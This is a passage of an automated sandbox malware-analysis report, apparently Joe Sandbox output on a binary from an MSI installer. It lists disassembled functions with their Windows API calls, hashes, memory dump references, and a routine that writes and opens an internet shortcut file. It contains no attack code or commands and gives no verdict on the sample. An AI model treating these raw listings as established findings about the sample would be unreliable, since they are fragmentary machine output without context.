                                                                                    • Instruction Fuzzy Hash: 77F04972A44200DFE700EF98E846B9C7BF0FB49725F0045AAF514EB2A0DB799940CF50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 00B657CC: GetLastError.KERNEL32(?,00000008,00B6AD4C), ref: 00B657D0
                                                                                      • Part of subcall function 00B657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B65872
                                                                                    • EnumSystemLocalesW.KERNEL32(00B6E01F,00000001,?,?,?,00B6E88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00B6E0FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2417226690-0
                                                                                    • Opcode ID: cc1c6e5882dc5f3268ae8af46888206160266f68c8d7d99f673d0e91b71fce91
                                                                                    • Instruction ID: 73f215f35f334a173329318316b6c9014b6d7fd1b47463b4adc113c87a0c4276
                                                                                    • Opcode Fuzzy Hash: cc1c6e5882dc5f3268ae8af46888206160266f68c8d7d99f673d0e91b71fce91
                                                                                    • Instruction Fuzzy Hash: 16F0E53A3002059BCB14AF35D84666A7FD5EFC1760F0640A8EA198B651CA79D882DB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00B500E2,00000000,00000000,00000004,00B4ED14,00000000,00000004,00B4F127,00000000,00000000), ref: 00B52410
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 2299586839-0
                                                                                    • Opcode ID: 2e5a3716c15a89b5cbf6c157a882667c49e58d593e4c07ed489a64ef260cccec
                                                                                    • Instruction ID: 038b6798e3e80519f6e964bde54d0fc7f23f82ceb68dc3b5135560907359174f
                                                                                    • Opcode Fuzzy Hash: 2e5a3716c15a89b5cbf6c157a882667c49e58d593e4c07ed489a64ef260cccec
                                                                                    • Instruction Fuzzy Hash: 50E0D832694104BAD7154BBC9E0FFBA76D8E70270BF5041D1EE02E41D1DAA1CA44A161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00B64E3F,?,20001004,00000000,00000002,?,?,00B64441), ref: 00B676E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 2299586839-0
                                                                                    • Opcode ID: 6f45312c5faaf84bdf8ed04f2b9fdb22c5d49ad27fe1af0373defafa237dbf8c
                                                                                    • Instruction ID: 1757d67213bac4afd27ae8654b2e6decc1943e1b6479d71c2d77c05b12d2cb27
                                                                                    • Opcode Fuzzy Hash: 6f45312c5faaf84bdf8ed04f2b9fdb22c5d49ad27fe1af0373defafa237dbf8c
                                                                                    • Instruction Fuzzy Hash: 80E04F3258961CBBCF122F61DC08EAE3F66EF45754F104060FC0566121CF358D60ABD5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,00B53077), ref: 00B53544
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: b17fc4c726e5712bcd2500c0976070ac377134e13fb3ee5e52539d5a9346e2bd
                                                                                    • Instruction ID: 48f659a164131a6b677c4cedbbe71efaf6ed3683607957b6efc093064b480307
                                                                                    • Opcode Fuzzy Hash: b17fc4c726e5712bcd2500c0976070ac377134e13fb3ee5e52539d5a9346e2bd
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 00B52C98: EnterCriticalSection.KERNEL32(00B8DD3C,?,?,?,00B323B6,00B8E638,5D8D6CBB,?,?,00B73D6D,000000FF), ref: 00B52CA3
                                                                                      • Part of subcall function 00B52C98: LeaveCriticalSection.KERNEL32(00B8DD3C,?,?,?,00B323B6,00B8E638,5D8D6CBB,?,?,00B73D6D,000000FF), ref: 00B52CE0
                                                                                    • GetProcessHeap.KERNEL32 ref: 00B32365
                                                                                      • Part of subcall function 00B52C4E: EnterCriticalSection.KERNEL32(00B8DD3C,?,?,00B32427,00B8E638,00B76B40), ref: 00B52C58
                                                                                      • Part of subcall function 00B52C4E: LeaveCriticalSection.KERNEL32(00B8DD3C,?,?,00B32427,00B8E638,00B76B40), ref: 00B52C8B
                                                                                      • Part of subcall function 00B52C4E: RtlWakeAllConditionVariable.NTDLL ref: 00B52D02
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                                                                    • String ID:
                                                                                    • API String ID: 325507722-0
                                                                                    • Opcode ID: 1b68b601892fca6f7c67d04bf064e7e0f77c066327efd2a041e735b70049f7d1
                                                                                    • Instruction ID: c503b5f109ca85891668f6afff657d4c647bc2cdb267cb7660a5bcd0e3c4577c
                                                                                    • Opcode Fuzzy Hash: 1b68b601892fca6f7c67d04bf064e7e0f77c066327efd2a041e735b70049f7d1
                                                                                    • Instruction Fuzzy Hash: 682146B19026009BD710EF58E946B497BE0EB26725F1042A9E835972F0EB749908CB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocHeap
                                                                                    • String ID:
                                                                                    • API String ID: 4292702814-0
                                                                                    • Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                    • Instruction ID: 55d430a7606b1b2662b24a4d0232504988c81858801387196286d6862cdec0c2
                                                                                    • Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                    • Instruction Fuzzy Hash: 8432AD34A0021ACFCF28DF99C991ABEB7F5EF45304F2845A9DD45A7305D636AE46CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 13702159a7d1dc3b6d6d55cc227888d322b5e19bff9e02add6cbd2cd145e2d11
                                                                                    • Instruction ID: 4cb8368ca697ed5a6429ae72f0d7190903824f25ca34df36a34a49355bb11784
                                                                                    • Opcode Fuzzy Hash: 13702159a7d1dc3b6d6d55cc227888d322b5e19bff9e02add6cbd2cd145e2d11
                                                                                    • Instruction Fuzzy Hash: 3B32E121D29F414DD7239634DC62339A28CAFB77D4F15D727E81ABAAA9EF3984C34500
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 69f8d901672d80c32efc72f9462db63695212bf194b5dfb4f66f6d16100485cf
                                                                                    • Instruction ID: afc6dc57a48283bf433a1769e352516ed67febdd920ffdea271b7924ca673428
                                                                                    • Opcode Fuzzy Hash: 69f8d901672d80c32efc72f9462db63695212bf194b5dfb4f66f6d16100485cf
                                                                                    • Instruction Fuzzy Hash: 8CE19D706006058FCB24CF68C590BBAB7F1FF49312F2487D9D956AB291D770AD4ACB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 3471368781-0
                                                                                    • Opcode ID: fcebd40bdd787d70b12b6ced7f095b88369900413c9b4484b010413898ea3057
                                                                                    • Instruction ID: 03807674d042d9bdce4656a714f4b9e0397d5d27aa095ef1c3c84a467f285d9c
                                                                                    • Opcode Fuzzy Hash: fcebd40bdd787d70b12b6ced7f095b88369900413c9b4484b010413898ea3057
                                                                                    • Instruction Fuzzy Hash: 0DB10875B007458BDB389F64CC92BB7B3E8EF44308F1845ADEA83C6584EA79E945CB10
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                    • Instruction ID: 3928d2804b3c0aa340013c3d4468577426f99496632482ce387d9284f1419f90
                                                                                    • Opcode Fuzzy Hash: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                    • Instruction Fuzzy Hash: EB517271E00219AFDF14CF99C991BAEBFF2EF88310F198099E815AB201C7349E54DB95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                    • Instruction ID: 65d25e235b267a3610ed2e4a8679363570e807d97c23616357eeebbea8668abc
                                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                    • Instruction Fuzzy Hash: DD1138772040824BD604C62EC4BA7B7E3D5EBC632F72C43EAC9818B758D362A9CD9600
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                    • Instruction ID: 1368f640b3d9db0db957a1ab0f5799900511fa4abbfc3f562877840105ac43f8
                                                                                    • Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                    • Instruction Fuzzy Hash: 9AE08C72911238EBCB14DB98CA1498AF3ECEB84B01B1504AAF601E3610C678DE00DBD1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                    • Instruction ID: 0e80d6f546028ceb10eb8fad4035db5a9fc8b921ffe26fe280b2e8fb8c03237c
                                                                                    • Opcode Fuzzy Hash: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                    • Instruction Fuzzy Hash: 1EC08C34000F0046DE298A108AB13A833D4F791782F8005ECC4430BA86C51EBC83DA01
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B5011D
                                                                                    • collate.LIBCPMT ref: 00B50126
                                                                                      • Part of subcall function 00B4EDF2: __EH_prolog3_GS.LIBCMT ref: 00B4EDF9
                                                                                      • Part of subcall function 00B4EDF2: __Getcoll.LIBCPMT ref: 00B4EE5D
                                                                                    • __Getcoll.LIBCPMT ref: 00B5016C
                                                                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B50180
                                                                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B50195
                                                                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B501D3
                                                                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B501E6
                                                                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B5022C
                                                                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B50260
                                                                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B5031B
                                                                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B5032E
                                                                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B5034B
                                                                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B50368
                                                                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B50385
                                                                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B502BD
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • numpunct.LIBCPMT ref: 00B503C4
                                                                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B503D4
                                                                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B50418
                                                                                      • Part of subcall function 00B36330: LocalAlloc.KERNELBASE(00000040,?,00B40E04,00000020,?,?,00B39942,00000000,5D8D6CBB,?,?,?,?,00B750DD,000000FF), ref: 00B36336
                                                                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B5042B
                                                                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B50448
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                                                    • String ID:
                                                                                    • API String ID: 3717464618-0
                                                                                    • Opcode ID: d842ff7e7f5178e52e5dcec0e369ea05fb89e4cd1540a9e36d79221ca4d12adf
                                                                                    • Instruction ID: 373b474323b00781f69d9f238d231fbc147d79eff89ebc67038d65c4674f2567
                                                                                    • Opcode Fuzzy Hash: d842ff7e7f5178e52e5dcec0e369ea05fb89e4cd1540a9e36d79221ca4d12adf
                                                                                    • Instruction Fuzzy Hash: 6691E671D012116BEB207BB44C46B7F7BE8EF45760F2084EDFD19AB281DA70890497A6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00B3667E
                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00B366D7
                                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00B366E2
                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00B366FE
                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00B749E5,000000FF), ref: 00B367DB
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00B749E5,000000FF), ref: 00B367E7
                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00B749E5), ref: 00B3682F
                                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,00B749E5,000000FF), ref: 00B3684A
                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00B749E5), ref: 00B36867
                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00B749E5,000000FF), ref: 00B36891
                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00B368D8
                                                                                    • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00B3692A
                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00B749E5,000000FF), ref: 00B3695C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                                    • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                                    • API String ID: 2199533872-3004881174
                                                                                    • Opcode ID: 0292cae4910acaa55367e280b527c69adce4ba796abd54049be1161b9fa90ed2
                                                                                    • Instruction ID: ac1f86b95fbe0068e93f9c1953ca8585f6f415fe490b125847dcf4ccb4b0e123
                                                                                    • Opcode Fuzzy Hash: 0292cae4910acaa55367e280b527c69adce4ba796abd54049be1161b9fa90ed2
                                                                                    • Instruction Fuzzy Hash: F8B11371904249AFEB20DF64CC86BEEBBF5EF55700F2081A9E904AB2C1DB705E44C7A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00B8DD3C,00000FA0,?,?,00B52B6A), ref: 00B52B98
                                                                                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00B52B6A), ref: 00B52BA3
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00B52B6A), ref: 00B52BB4
                                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B52BC6
                                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B52BD4
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00B52B6A), ref: 00B52BF7
                                                                                    • DeleteCriticalSection.KERNEL32(00B8DD3C,00000007,?,?,00B52B6A), ref: 00B52C13
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00B52B6A), ref: 00B52C23
                                                                                    Strings
                                                                                    • WakeAllConditionVariable, xrefs: 00B52BCC
                                                                                    • SleepConditionVariableCS, xrefs: 00B52BC0
                                                                                    • kernel32.dll, xrefs: 00B52BAF
                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B52B9E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
